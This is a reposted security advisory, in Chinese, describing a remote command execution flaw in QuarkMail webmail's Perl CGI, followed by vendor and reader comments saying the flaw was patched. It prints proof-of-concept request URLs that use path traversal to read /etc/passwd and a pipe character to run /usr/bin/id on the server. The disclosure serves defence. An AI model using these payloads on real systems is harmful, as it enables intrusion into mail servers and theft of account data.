快客电邮(QuarkMail)远程命令执行漏洞

来源:80sec

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。

漏洞厂商:http://www.ipmotor.com/

漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。

漏洞证明:登录进入系统之后访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes

即可得到系统账户文件,访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes

即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。

漏洞解决:请等待官方补丁。

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • 雇页

    郑重声明
    近期在互联网上出现了一些针对“快客电邮(QuarkMail)远程命令执行漏洞”的传闻,我方(雄智伟业科技有限公司)特做如下声明:

    1. 所发帖子中涉及的内容是我公司6.0版本中发现的问题,该版本已经不再销售;
    2. 现用的6.0版本已经在08年初对漏洞进行了升级更新,问题已经解决;
    3. 如有遗漏的用户,请提供公司详细情况,并与我公司取得联系,我们将进行免费安全升级。
    联系方式如下:
    公司名称:雄智伟业科技有限公司
    联系电话:029-88335993转 技术部

    特此声明!
    感谢各界朋友对QUARK电邮的关心与支持!望多提宝贵意见!

    雄智伟业科技有限公司
    2009-5-25

  • 小王

    您好,上面您转载的那篇漏洞文章,早就已经得到了解决,但是您的博客依然在显示,希望可以和您沟通。

发表评论